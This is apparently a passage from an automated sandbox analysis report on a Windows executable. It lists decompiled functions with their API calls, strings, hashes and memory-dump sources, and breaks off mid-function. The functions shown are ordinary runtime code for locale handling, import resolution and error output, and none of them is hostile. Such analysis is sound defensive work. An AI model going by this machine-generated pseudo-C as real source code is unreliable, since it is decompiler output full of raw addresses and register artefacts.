                                                                    • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                    • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                                    • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                    • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A7E4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}









                                                                    0x0040a7e4
                                                                    0x0040a7e7
                                                                    0x0040a7e9
                                                                    0x0040a7ea
                                                                    0x0040a7eb
                                                                    0x0040a7ed
                                                                    0x0040a7f1
                                                                    0x0040a7f2
                                                                    0x0040a7f7
                                                                    0x0040a7fa
                                                                    0x0040a802
                                                                    0x0040a80e
                                                                    0x0040a835
                                                                    0x0040a83c
                                                                    0x0040a84e
                                                                    0x0040a857
                                                                    0x0040a868
                                                                    0x0040a86d
                                                                    0x0040a875
                                                                    0x0040a87a
                                                                    0x0040a883
                                                                    0x0040a883
                                                                    0x0040a888
                                                                    0x0040a890
                                                                    0x0040a89a
                                                                    0x0040a89a
                                                                    0x0040a859
                                                                    0x0040a85d
                                                                    0x0040a85d
                                                                    0x0040a857
                                                                    0x0040a8a4
                                                                    0x0040a8a9
                                                                    0x0040a8c3
                                                                    0x0040a8cd
                                                                    0x0040a810
                                                                    0x0040a81c
                                                                    0x0040a826
                                                                    0x0040a826
                                                                    0x0040a8d4
                                                                    0x0040a8d7
                                                                    0x0040a8da
                                                                    0x0040a8e7

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                                    • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                                    • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                                    • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                                    • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                                    • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                    • String ID: en-US,en,
                                                                    • API String ID: 975949045-3579323720
                                                                    • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                    • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                                    • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                    • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042301C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}










                                                                    0x00423022
                                                                    0x00423025
                                                                    0x00423028
                                                                    0x0042302d
                                                                    0x0042302e
                                                                    0x00423033
                                                                    0x00423036
                                                                    0x00423049
                                                                    0x00423050
                                                                    0x00423063
                                                                    0x004230b8
                                                                    0x004230c5
                                                                    0x004230ce
                                                                    0x004230ce
                                                                    0x00423065
                                                                    0x00423080
                                                                    0x0042308d
                                                                    0x00423096
                                                                    0x00423096
                                                                    0x00423080
                                                                    0x004230de
                                                                    0x004230e9
                                                                    0x004230f4
                                                                    0x004230f4
                                                                    0x00423052
                                                                    0x00423052
                                                                    0x00423054
                                                                    0x004230fa
                                                                    0x004230fd
                                                                    0x00423100
                                                                    0x00423108
                                                                    0x00423115

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressCloseHandleModuleProc
                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                    • API String ID: 4190037839-2401316094
                                                                    • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                    • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                                    • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                    • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D218, Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}







































                                                                    0x0040d22c
                                                                    0x0040d232
                                                                    0x0040d234
                                                                    0x0040d237
                                                                    0x0040d244
                                                                    0x0040d251
                                                                    0x0040d25e
                                                                    0x0040d26b
                                                                    0x0040d278
                                                                    0x0040d285
                                                                    0x0040d28e
                                                                    0x0040d29c
                                                                    0x0040d29e
                                                                    0x0040d29f
                                                                    0x0040d2a5
                                                                    0x0040d2ab
                                                                    0x0040d2b2
                                                                    0x0040d2b4
                                                                    0x0040d2ba
                                                                    0x0040d2c0
                                                                    0x0040d2d0
                                                                    0x00000000
                                                                    0x0040d2d5
                                                                    0x0040d2e2
                                                                    0x0040d2e7
                                                                    0x0040d2e9
                                                                    0x0040d2eb
                                                                    0x0040d2eb
                                                                    0x0040d2f1
                                                                    0x0040d2f4
                                                                    0x0040d2fc
                                                                    0x0040d306
                                                                    0x0040d309
                                                                    0x0040d30e
                                                                    0x0040d329
                                                                    0x0040d310
                                                                    0x0040d31c
                                                                    0x0040d31c
                                                                    0x0040d32c
                                                                    0x0040d335
                                                                    0x0040d34e
                                                                    0x0040d350
                                                                    0x0040d412
                                                                    0x0040d412
                                                                    0x0040d41c
                                                                    0x0040d42a
                                                                    0x0040d42a
                                                                    0x0040d42e
                                                                    0x0040d47b
                                                                    0x0040d47d
                                                                    0x0040d484
                                                                    0x0040d48e
                                                                    0x0040d49c
                                                                    0x0040d49c
                                                                    0x0040d4a0
                                                                    0x0040d4a2
                                                                    0x0040d4a7
                                                                    0x0040d4ad
                                                                    0x0040d4bd
                                                                    0x0040d4c2
                                                                    0x0040d4c2
                                                                    0x0040d4a0
                                                                    0x00000000
                                                                    0x0040d430
                                                                    0x0040d434
                                                                    0x0040d46f
                                                                    0x0040d479
                                                                    0x00000000
                                                                    0x0040d43c
                                                                    0x0040d43f
                                                                    0x0040d447
                                                                    0x00000000
                                                                    0x0040d460
                                                                    0x0040d466
                                                                    0x0040d46b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040d4c5
                                                                    0x0040d4c8
                                                                    0x00000000
                                                                    0x0040d4c8
                                                                    0x0040d447
                                                                    0x0040d434
                                                                    0x0040d42e
                                                                    0x0040d35d
                                                                    0x0040d36b
                                                                    0x0040d36b
                                                                    0x0040d36f
                                                                    0x0040d37a
                                                                    0x0040d37a
                                                                    0x0040d37e
                                                                    0x0040d3cb
                                                                    0x0040d3d7
                                                                    0x0040d40d
                                                                    0x0040d3d9
                                                                    0x0040d3dd
                                                                    0x0040d3e3
                                                                    0x0040d3e8
                                                                    0x0040d3ed
                                                                    0x0040d3f4
                                                                    0x0040d3fa
                                                                    0x0040d3ff
                                                                    0x0040d404
                                                                    0x0040d404
                                                                    0x0040d3ed
                                                                    0x0040d3dd
                                                                    0x00000000
                                                                    0x0040d380
                                                                    0x0040d385
                                                                    0x0040d38f
                                                                    0x0040d39d
                                                                    0x0040d39d
                                                                    0x0040d3a1
                                                                    0x00000000
                                                                    0x0040d3a3
                                                                    0x0040d3a3
                                                                    0x0040d3a8
                                                                    0x0040d3ae
                                                                    0x0040d3be
                                                                    0x00000000
                                                                    0x0040d3c3
                                                                    0x0040d3a1
                                                                    0x0040d337
                                                                    0x0040d343
                                                                    0x0040d347
                                                                    0x00000000
                                                                    0x0040d349
                                                                    0x0040d4ca
                                                                    0x0040d4d1
                                                                    0x0040d4d5
                                                                    0x0040d4d8
                                                                    0x0040d4db
                                                                    0x0040d4e4
                                                                    0x0040d4e4
                                                                    0x00000000
                                                                    0x0040d4ea
                                                                    0x0040d347

                                                                    APIs
                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                    • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                                    • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                    • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004047B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                                    0x004047b0
                                                                    0x004047b3
                                                                    0x004047b5
                                                                    0x004047be
                                                                    0x00404821
                                                                    0x00404826
                                                                    0x00404827
                                                                    0x00404828
                                                                    0x0040482a
                                                                    0x004047c0
                                                                    0x004047c9
                                                                    0x004047d8
                                                                    0x004047e4
                                                                    0x004047e9
                                                                    0x004047ef
                                                                    0x004047fd
                                                                    0x0040480b
                                                                    0x0040481a
                                                                    0x0040481a
                                                                    0x00404832

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                                    • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                                    • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                                    • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: 9@
                                                                    • API String ID: 3320372497-3209974744
                                                                    • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                    • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                                    • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                    • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041F0F4, Relevance: 12.1, APIs: 8, Instructions: 97filewindowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 62%
                                                                    			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}
















                                                                    0x0041f0fd
                                                                    0x0041f0fe
                                                                    0x0041f101
                                                                    0x0041f106
                                                                    0x0041f107
                                                                    0x0041f10c
                                                                    0x0041f10f
                                                                    0x0041f122
                                                                    0x0041f124
                                                                    0x0041f12c
                                                                    0x0041f1ca
                                                                    0x0041f1cf
                                                                    0x0041f1de
                                                                    0x0041f1f8
                                                                    0x0041f132
                                                                    0x0041f132
                                                                    0x0041f13c
                                                                    0x0041f15a
                                                                    0x0041f15c
                                                                    0x0041f16b
                                                                    0x0041f188
                                                                    0x0041f1a0
                                                                    0x0041f1ba
                                                                    0x0041f1ba
                                                                    0x0041f1ff
                                                                    0x0041f202
                                                                    0x0041f205
                                                                    0x0041f20d
                                                                    0x0041f218

                                                                    APIs
                                                                      • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                      • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                      • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                      • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                                    • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                                    • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                                    • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                                    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 135118572-0
                                                                    • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                    • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                                    • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                    • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404464, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
